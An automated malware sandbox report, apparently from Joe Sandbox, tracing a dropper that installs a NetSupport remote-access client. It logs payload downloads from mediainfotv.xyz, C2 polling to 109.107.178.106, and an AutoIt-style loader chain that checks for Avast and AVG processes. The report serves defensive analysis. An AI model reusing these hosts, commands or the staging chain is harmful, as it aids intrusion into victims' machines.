                                Source: rrrr.exe, 00000009.00000003.638785333.0000000002A65000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638818422.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639441683.00000000029F8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638704528.00000000029E8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639138667.0000000002A57000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638926912.0000000002A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                Source: rrrr.exe, 00000009.00000003.632252203.0000000002291000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632381076.00000000027CA000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631975000.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631683973.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632122574.0000000002798000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631656746.00000000022EC000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.643014805.00000000022C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                                Source: rrrr.exe, 00000009.00000003.638785333.0000000002A65000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638818422.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638704528.00000000029E8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639138667.0000000002A57000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638926912.0000000002A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                                Source: rrrr.exe, 00000009.00000003.638785333.0000000002A65000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638818422.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639468527.0000000002A43000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639481606.0000000002A43000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639441683.00000000029F8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638704528.00000000029E8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639138667.0000000002A57000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638926912.0000000002A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                                Source: rrrr.exe, 00000009.00000003.638785333.0000000002A65000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638818422.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639441683.00000000029F8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638704528.00000000029E8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639138667.0000000002A57000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638926912.0000000002A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                Source: rrrr.exe, 00000009.00000003.638785333.0000000002A65000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638818422.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638704528.00000000029E8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639138667.0000000002A57000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638926912.0000000002A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                                Source: rrrr.exe, 00000009.00000003.638785333.0000000002A65000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638818422.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639441683.00000000029F8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638704528.00000000029E8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639138667.0000000002A57000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638926912.0000000002A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                Source: rrrr.exe, 00000009.00000003.638565223.0000000002A51000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638818422.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638487280.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638565223.0000000002A2C000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639138667.0000000002A57000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638926912.0000000002A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                                Source: client32.exe, 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350451270.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368979040.00000000111E2000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: client32.exe, 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350451270.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368979040.00000000111E2000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(L
                                Source: rrrr.exe, 00000009.00000003.632252203.0000000002291000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631975000.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.631683973.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.632122574.0000000002798000.00000004.00001000.00020000.00000000.sdmp, Engine.exe, 0000000A.00000000.643264856.0000000000578000.00000008.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.pantaray.com
                                Source: client32.exe, 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350451270.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368979040.00000000111E2000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.pci.co.uk/support
                                Source: client32.exe, 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350451270.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368979040.00000000111E2000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: rrrr.exe, 00000009.00000003.638785333.0000000002A65000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638818422.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638704528.00000000029E8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639138667.0000000002A57000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638926912.0000000002A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                                Source: rrrr.exe, 00000009.00000003.638785333.0000000002A65000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638818422.00000000029E1000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639468527.0000000002A43000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639481606.0000000002A43000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639441683.00000000029F8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638704528.00000000029E8000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639138667.0000000002A57000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638926912.0000000002A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: unknownDNS traffic detected: queries for: mediainfotv.xyz
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00952750 wsprintfW,InternetOpenW,InternetCloseHandle,InternetOpenUrlW,CreateFileW,CreateFileW,InternetReadFile,WriteFile,InternetCloseHandle,CloseHandle,0_2_00952750
                                Source: global trafficHTTP traffic detected: GET /nesup3.zip HTTP/1.1User-Agent: YahooBotHost: mediainfotv.xyz
                                Source: global trafficHTTP traffic detected: GET /rr.zip HTTP/1.1User-Agent: YahooBotHost: mediainfotv.xyz
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                                Source: unknownTCP traffic detected without corresponding DNS query: 82.118.23.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 82.118.23.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 82.118.23.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 82.118.23.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 82.118.23.50
                                Source: unknownTCP traffic detected without corresponding DNS query: 82.118.23.50
                                Source: unknownHTTP traffic detected: POST http://109.107.178.106/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 109.107.178.106Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: unknownHTTPS traffic detected: 198.54.121.245:443 -> 192.168.2.4:49695 version: TLS 1.2
                                Source: Yara matchFile source: 2.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 5676, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 2400, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 836, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\PCICL32.DLL, type: DROPPED
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,1_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,1_2_110077A0
                                Source: rrrr.exe, 00000009.00000002.700405143.00000000006AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,1_2_11114590

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Found potential ransomware demand text
                                Source: client32.exe, 00000001.00000002.828774382.000000006CFC1000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: ?unlock@critical_section@Concurrency@@QAEXXZ
                                Source: client32.exe, 00000001.00000002.828774382.000000006CFC1000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: ?unlock@reader_writer_lock@Concurrency@@QAEXXZ
                                Source: client32.exe, 00000002.00000002.350769337.000000006CFC1000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: ?unlock@critical_section@Concurrency@@QAEXXZ
                                Source: client32.exe, 00000002.00000002.350769337.000000006CFC1000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: ?unlock@reader_writer_lock@Concurrency@@QAEXXZ
                                Source: client32.exe, 00000003.00000002.369216420.000000006CFC1000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: ?unlock@critical_section@Concurrency@@QAEXXZ
                                Source: client32.exe, 00000003.00000002.369216420.000000006CFC1000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: ?unlock@reader_writer_lock@Concurrency@@QAEXXZ

                                System Summary

                                barindex
                                Malicious sample detected (through community Yara rule)
                                Source: Process Memory Space: client32.exe PID: 5676, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_004010600_2_00401060
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0042E8D30_2_0042E8D3
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_004038800_2_00403880
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_004199700_2_00419970
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_004282000_2_00428200
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0042E2130_2_0042E213
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00427A200_2_00427A20
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0040CA900_2_0040CA90
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00402C500_2_00402C50
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0042DCD10_2_0042DCD1
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0040ACB00_2_0040ACB0
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0042754D0_2_0042754D
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00427DF40_2_00427DF4
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_004246150_2_00424615
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_004286200_2_00428620
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0042F6A90_2_0042F6A9
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0041BEB00_2_0041BEB0
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0041C7E00_2_0041C7E0
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0042D78F0_2_0042D78F
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00402FB00_2_00402FB0
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0096C8F00_2_0096C8F0
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_009510000_2_00951000
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0096D0300_2_0096D030
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00968A100_2_00968A10
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0096B0500_2_0096B050
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_009679800_2_00967980
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0095E1A00_2_0095E1A0
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_009571E00_2_009571E0
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_009539600_2_00953960
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_009602A00_2_009602A0
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_009692700_2_00969270
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00965C900_2_00965C90
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_009614C00_2_009614C0
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0097B40C0_2_0097B40C
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0095FC500_2_0095FC50
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_11029BB01_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_1101C1101_2_1101C110
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_111640E01_2_111640E0
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_111683451_2_11168345
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_1100892B1_2_1100892B
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_1115F8401_2_1115F840
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_1101BCD01_2_1101BCD0
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_1101CF301_2_1101CF30
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,1_2_1115EA00
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeProcess Stats: CPU usage > 98%
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifSection loaded: ters-alreq-std-v19.dll
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif 15600CCDEF5A64B40D206D89234A51BE1E11BD878DCEFC5986590BCF40D9D571
                                Source: 0ud2VlMOvF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: Process Memory Space: client32.exe PID: 5676, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: String function: 004195DE appears 34 times
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: String function: 00421294 appears 43 times
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: String function: 00970640 appears 32 times
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: String function: 11161299 appears 32 times
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: String function: 1105E820 appears 40 times
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: String function: 11147060 appears 129 times
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: String function: 11029A70 appears 412 times
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: String function: 1116FED0 appears 31 times
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_11113190: GetKeyState,DeviceIoControl,keybd_event,1_2_11113190
                                Source: Engine.exe.9.drStatic PE information: Resource name: BINARY type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Source: Engine.exe.9.drStatic PE information: Resource name: EXEFILE type: PE32 executable (console) Intel 80386, for MS Windows
                                Source: Engine.exe.9.drStatic PE information: Resource name: EXEFILE type: PE32 executable (console) Intel 80386, for MS Windows
                                Source: 0ud2VlMOvF.exeBinary or memory string: OriginalFilename vs 0ud2VlMOvF.exe
                                Source: 0ud2VlMOvF.exe, 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecanetworkvwr.exeN vs 0ud2VlMOvF.exe
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeProcess token adjusted: SecurityJump to behavior
                                Source: Engine.exe.9.drStatic PE information: Section: UPX1 ZLIB complexity 0.9961672718903437
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeFile created: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8Jump to behavior
                                Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@26/58@4/5
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_1105A760 GetLastError,FormatMessageA,LocalFree,1_2_1105A760
                                Source: C:\Users\user\AppData\Local\Temp\rrrr.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_11089430 FindResourceA,LoadResource,LockResource,1_2_11089430
                                Source: 0ud2VlMOvF.exeVirustotal: Detection: 10%
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\0ud2VlMOvF.exe C:\Users\user\Desktop\0ud2VlMOvF.exe
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeProcess created: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe "C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe "C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe "C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe"
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeProcess created: C:\Users\user\AppData\Local\Temp\rrrr.exe "C:\Users\user\AppData\Local\Temp\rrrr.exe"
                                Source: C:\Users\user\AppData\Local\Temp\rrrr.exeProcess created: C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe /TH_ID=_2692 /OriginExe="C:\Users\user\AppData\Local\Temp\rrrr.exe"
                                Source: C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\CmD.exe /c cmd < Highlights
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell get-process avastui
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell get-process avgui
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^cruzVehicleRespectiveDiane$" Players
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif 4744\\Close.exe.pif 4744\\m
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 8
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeProcess created: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe "C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeProcess created: C:\Users\user\AppData\Local\Temp\rrrr.exe "C:\Users\user\AppData\Local\Temp\rrrr.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\rrrr.exeProcess created: C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe /TH_ID=_2692 /OriginExe="C:\Users\user\AppData\Local\Temp\rrrr.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\CmD.exe /c cmd < HighlightsJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell get-process avastui Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell get-process avgui Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^cruzVehicleRespectiveDiane$" Players Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif 4744\\Close.exe.pif 4744\\m Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 8Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif
